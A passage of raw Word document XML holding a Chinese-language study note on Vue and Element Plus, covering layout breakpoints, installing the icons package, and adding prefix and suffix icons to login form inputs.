      <w:r w:rsidRPr="009D3AFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>≥</w:t>
      </w:r>
      <w:r w:rsidRPr="009D3AFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>992px</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D22FE2D" w14:textId="48758E40" w:rsidR="00DA6FB9" w:rsidRDefault="009D3AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>2:12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6D7C9D" w14:textId="33FD4F93" w:rsidR="009D3AFE" w:rsidRDefault="009D3AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21235CA8" wp14:editId="38D46719">
            <wp:extent cx="3209897" cy="1385828"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="177419610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96108" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId191"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3218013" cy="1389332"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="527DDB57" w14:textId="361C926B" w:rsidR="00DA6FB9" w:rsidRDefault="009D3AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再小：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41546E06" w14:textId="1E2292D4" w:rsidR="00DA6FB9" w:rsidRDefault="009D3AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动布局</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0DB8B7" w14:textId="78F6325B" w:rsidR="00DA6FB9" w:rsidRDefault="009D3AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17F6C373" wp14:editId="01161515">
            <wp:extent cx="2917026" cy="1694165"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="150916370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63707" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId192"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2923053" cy="1697665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C742AD6" w14:textId="1E4A112C" w:rsidR="00DA6FB9" w:rsidRDefault="006A1A8F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="689" w:name="_Toc159780119"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局引入图标</w:t>
      </w:r>
      <w:bookmarkEnd w:id="689"/>
    </w:p>
    <w:p w14:paraId="7F9C0BDC" w14:textId="083B717A" w:rsidR="00DA6FB9" w:rsidRDefault="006A1A8F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认提供的图标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D48B54B" w14:textId="665EC450" w:rsidR="006A1A8F" w:rsidRDefault="00352C68" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId193" w:anchor="icon-collection" w:history="1">
        <w:r w:rsidRPr="008F6C9E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://element-plus.org/zh-CN/component/icon.html#icon-collection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33395102" w14:textId="47D773A9" w:rsidR="00352C68" w:rsidRDefault="00352C68" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入框如何带图标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187726F0" w14:textId="22F4C842" w:rsidR="00352C68" w:rsidRPr="00352C68" w:rsidRDefault="00352C68" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00352C68">
        <w:t>https://element-plus.org/zh-CN/component/input.html#%E5%B8%A6%E5%9B%BE%E6%A0%87%E7%9A%84%E8%BE%93%E5%85%A5%E6%A1%86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF6FE77" w14:textId="16B757E5" w:rsidR="006A1A8F" w:rsidRDefault="00137C92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先安装图标组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EE726C" w14:textId="03C3015A" w:rsidR="006A1A8F" w:rsidRPr="00137C92" w:rsidRDefault="00137C92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00137C92">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cnpm install @element-plus/icons-vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21430BE7" w14:textId="77777777" w:rsidR="006A1A8F" w:rsidRDefault="006A1A8F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55960786" w14:textId="77777777" w:rsidR="006A1A8F" w:rsidRDefault="006A1A8F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="207FF900" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19808C45" w14:textId="68CBEE84" w:rsidR="00DA6FB9" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中新增引入语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEAA4F7" w14:textId="22CCE442" w:rsidR="00F7547B" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F7547B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { Calendar, Search } from '@element-plus/icons-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7391E44B" w14:textId="68954508" w:rsidR="00DA6FB9" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>正文代码添加</w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>icon</w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>标签，</w:t>
      </w:r>
      <w:r w:rsidR="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>插入</w:t>
      </w:r>
      <w:r w:rsidR="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r w:rsidR="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>标签，</w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408F70FC" w14:textId="77777777" w:rsidR="00F7547B" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;el-form :model="form" class="w-[250px]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE552D" w14:textId="77777777" w:rsidR="00F7547B" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27469330" w14:textId="77777777" w:rsidR="00F7547B" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;el-input v-model="form.username" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请输入用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59896B3B" w14:textId="77777777" w:rsidR="00F7547B" w:rsidRPr="00F7547B" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F7547B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;template #suffix&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E3ABA0" w14:textId="77777777" w:rsidR="00F7547B" w:rsidRPr="00F7547B" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7547B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                            &lt;el-icon class="el-input__icon"&gt;&lt;calendar /&gt;&lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443BCFE6" w14:textId="77777777" w:rsidR="00F7547B" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F7547B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A37BED" w14:textId="77777777" w:rsidR="00F7547B" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD616FB" w14:textId="77777777" w:rsidR="00F7547B" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/el-form-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEFF80C" w14:textId="4F3C5387" w:rsidR="00DA6FB9" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DB423F" w14:textId="2681A453" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>另一个在正文代码直接引用的方法是如下，不需要改</w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>非得一对儿的</w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>&lt;&gt;&lt;/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>然后还插入</w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F049486" w14:textId="77777777" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;el-input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC29081" w14:textId="77777777" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        v-model="input1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2E64B3" w14:textId="77777777" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        class="w-50 m-2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADA1DF1" w14:textId="77777777" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        placeholder="Pick a date"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBB6438" w14:textId="77777777" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:suffix-icon="Calendar"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C007EA0" w14:textId="77777777" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A06A880" w14:textId="77777777" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;el-input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7B1164" w14:textId="77777777" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        v-model="input2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0856E978" w14:textId="77777777" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        class="w-50 m-2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094766A8" w14:textId="77777777" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        placeholder="Type something"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1339E824" w14:textId="77777777" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="005948E5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:prefix-icon="Search"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130BAE98" w14:textId="2F8B6DE4" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16012402" w14:textId="77777777" w:rsidR="005948E5" w:rsidRDefault="005948E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C2EE3C" w14:textId="4A41F462" w:rsidR="00DA6FB9" w:rsidRDefault="00F7547B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F49220D" wp14:editId="3DA21D67">
            <wp:extent cx="2865294" cy="1649286"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="213595852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58521" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId194"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2869052" cy="1651449"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A361D" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023AA080" w14:textId="40B9F534" w:rsidR="00DA6FB9" w:rsidRDefault="00C67D73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图标有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>prefix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> suffix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，区别就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前缀</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后缀</w:t>
      </w:r>
      <w:r w:rsidR="000618A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，改一下就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2BF730" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B6B81F" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C232E9" w14:textId="6BD52022" w:rsidR="00DA6FB9" w:rsidRDefault="00CC599E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:hyperlink r:id="rId195" w:anchor="icon-collection" w:history="1">
        <w:r w:rsidRPr="008F6C9E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://element-plus.org/zh-CN/component/icon.html#icon-collection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中找到的图标，跟着上面样例改图标就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5027F095" w14:textId="4D6B5EF7" w:rsidR="00DA6FB9" w:rsidRDefault="00CC599E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如复制某图标得</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27455919" w14:textId="58CEE0D6" w:rsidR="00DA6FB9" w:rsidRDefault="00CC599E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC599E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-icon&gt;&lt;User /&gt;&lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A77ED2C" w14:textId="35702455" w:rsidR="00DA6FB9" w:rsidRDefault="00CC599E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的引入语句就跟着改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入了什么元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D289B3" w14:textId="61E54D44" w:rsidR="00DA6FB9" w:rsidRDefault="00CC599E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC599E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { User } from '@element-plus/icons-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F97445" w14:textId="3C886479" w:rsidR="00DA6FB9" w:rsidRDefault="004B76C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE1F2E" w14:textId="63A49643" w:rsidR="00DA6FB9" w:rsidRDefault="004B76C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004B76C7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { User, Lock } from '@element-plus/icons-vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2F16AF" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F85EB6E" w14:textId="77777777" w:rsidR="00DA6FB9" w:rsidRDefault="00DA6FB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA582C0" w14:textId="25935D77" w:rsidR="00DA6FB9" w:rsidRDefault="005463D1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入全局图标</w:t>
